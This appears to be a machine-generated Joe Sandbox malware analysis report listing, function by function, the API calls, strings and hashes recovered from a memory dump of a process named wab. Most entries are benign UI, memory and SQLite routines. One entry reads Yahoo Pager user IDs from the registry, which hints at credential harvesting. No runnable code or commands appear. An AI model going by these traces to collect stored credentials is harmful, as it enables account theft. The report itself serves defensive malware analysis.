                                                                                                                                                                                                                          • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                                                                                                                                                                                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                          • API String ID: 2859077140-3316789007
                                                                                                                                                                                                                          • Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                                                          • Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                          • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                          • Opcode ID: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                                                          • Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409031
                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • {?@ UD, xrefs: 0040900D
                                                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                                                                                                                                                                                                          • API String ID: 408644273-2682877464
                                                                                                                                                                                                                          • Opcode ID: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                                                          • Instruction ID: 644781a60c69e86f7c2c511092586478b4ed4a6ca21543a67b17e89033411e60
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53F0E9729041987BEB129764EC01FCA77AC9B4974BF1000E6FB49F10C2D5F89EC48AAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                          • API String ID: 1670431679-1552265934
                                                                                                                                                                                                                          • Opcode ID: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                                                          • Instruction ID: c7de35334a9b91ea45d990eb2cc533a67ee34048a8af2c328f2cc0c5e5106846
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0ECBA90010877DB11BB54DC05F9A77FCBB81304F1500B6FA45F2142EE74DA058F99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,75C271C0,00405E9E,00000000), ref: 00410912
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                          • API String ID: 145871493-1506664499
                                                                                                                                                                                                                          • Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                                                          • Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                          • String ID: $no query solution
                                                                                                                                                                                                                          • API String ID: 368790112-326442043
                                                                                                                                                                                                                          • Opcode ID: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                                          • Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                                                          • Opcode ID: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                                          • Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                          • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                                          • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                                                          • API String ID: 231171946-3708268960
                                                                                                                                                                                                                          • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                                          • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                          • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                          • Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                                          • Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                          • String ID: winRead
                                                                                                                                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                          • Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                                          • Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A8F8
                                                                                                                                                                                                                            • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A93D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                          • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                          • Opcode ID: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                                                          • Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 125969286-0
                                                                                                                                                                                                                          • Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                                                          • Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00408E33
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00408E40
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00408E4B
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                          • Opcode ID: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                                                          • Instruction ID: d5d25afb3259b03ed1d628add5c616d0d22dc24c96253af88726d5856d44a725
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01653680052ABBDB11ABA59C49EFFBFBCFF06750F04402AFD05A2181D77895018BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                                                                                            • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                                                                                            • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                                            • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                                            • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                                          • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2374668499-0
                                                                                                                                                                                                                          • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                                          • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040AACD
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <%s>, xrefs: 0040AAFE
                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                          • API String ID: 3699762281-1998499579
                                                                                                                                                                                                                          • Opcode ID: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                                          • Instruction ID: a3dff73391336119dc4caae329f843e57b3ce466119e41e431a2bb454e721b3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5ee42966936a1138623645e18684dfcccb61381e14bbb228212885f4d89bd19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED01F7729401296AEB20B655CC45FDA7A6CAF45305F0400BAB509B2182DBB49E548BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                                          • Instruction ID: ea629a9aafeff6281071dae141f51b3a8c797cef86d835f03ce988520f4efe7f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a9d4f54567c0a48d1859bf8158ae1996b1b95a3d5575a953b4da3af230d69c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0FF73609B01DBD7209FA99AC065BF7E9AB48724BA4093FF149D3642C738BC54C618
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409820
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409833
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409846
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409859
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040986D
                                                                                                                                                                                                                            • Part of subcall function 004077E4: ??3@YAXPAX@Z.MSVCRT ref: 004077EB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                                          • Instruction ID: 7a7d368fa20b86f0ae4ccc19201ff918d3b0396c1b4e5cf9e7c68f971a3fafa8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c01388865c204718a59a81bbac89ec1da5725ce67048d786a5844de5934490
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F03633D1A930D7C6257B66500164EE3686E86B3931942AFF9047B7D28F3C7C5485DE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406EA5: memset.MSVCRT ref: 00406EC5
                                                                                                                                                                                                                            • Part of subcall function 00406EA5: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406ED8
                                                                                                                                                                                                                            • Part of subcall function 00406EA5: _strcmpi.MSVCRT ref: 00406EEA
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00410113
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0041011B
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00410125
